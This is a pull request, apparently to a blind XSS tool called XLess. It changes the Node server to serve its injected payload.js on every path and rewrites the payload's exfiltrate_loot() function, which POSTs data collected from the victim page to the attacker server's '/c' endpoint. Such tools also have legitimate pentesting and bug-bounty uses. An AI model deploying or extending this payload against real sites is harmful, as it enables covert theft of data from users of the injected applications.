### PR TITLE
Always return the payload JS for better BXSS injection and tracking

### DIFF
--- a/index.js
+++ b/index.js
@@ -7,6 +7,7 @@ var bodyParser = require("body-parser");
 var cors = require("cors");
 const process = require("process");
 var request = require("request");
+const path = require("path")
 
 // Support local development with .env
 require('dotenv').config()
@@ -201,8 +202,7 @@ app.all("/*", (req, res) => {
   data = {form: {"payload": JSON.stringify({"username": "XLess", "mrkdwn": true, "text": alert}) }}
 
   request.post(slack_incoming_webhook, data, (out)  => {
-    res.send("ok\n")
-    res.end()
+    res.sendFile(path.join(__dirname + '/payload.js'))
   });
 })
 

--- a/now.json
+++ b/now.json
@@ -5,11 +5,9 @@
     "IMGBB_API_KEY": "@imgbb-api-key"
     },
     "builds": [
-        { "src": "index.js", "use": "@now/node-server" },
-         { "src": "payload.js", "use": "@now/static" }
+        { "src": "index.js", "use": "@now/node-server" }
     ],
     "routes": [
-        { "src": "/.+", "dest": "index.js" },
-        { "src": "/", "dest": "payload.js" }
+        { "src": "/.+", "dest": "index.js" }
       ]
 }

--- a/payload.js
+++ b/payload.js
@@ -46,10 +46,12 @@ function collect_data() {
 
 
 function exfiltrate_loot() {
+  // Get the URI of our BXSS server
+  var uri = new URL(curScript.src);
+  var exf_url = uri.origin + "/c"
+  
   var xhr = new XMLHttpRequest()
-  const url = curScript.src.split("?")[0] + "c"
-  xhr.open("POST", url, true)
-
+  xhr.open("POST", exf_url, true)
   xhr.setRequestHeader("Content-Type", "application/json")
   xhr.send(JSON.stringify(collected_data))
 }


### PR DESCRIPTION
At the moment, the payload.js is returned only for the base path, while we want to inject other payloads on various applications/endpoints, and be able to track where the injection was triggered.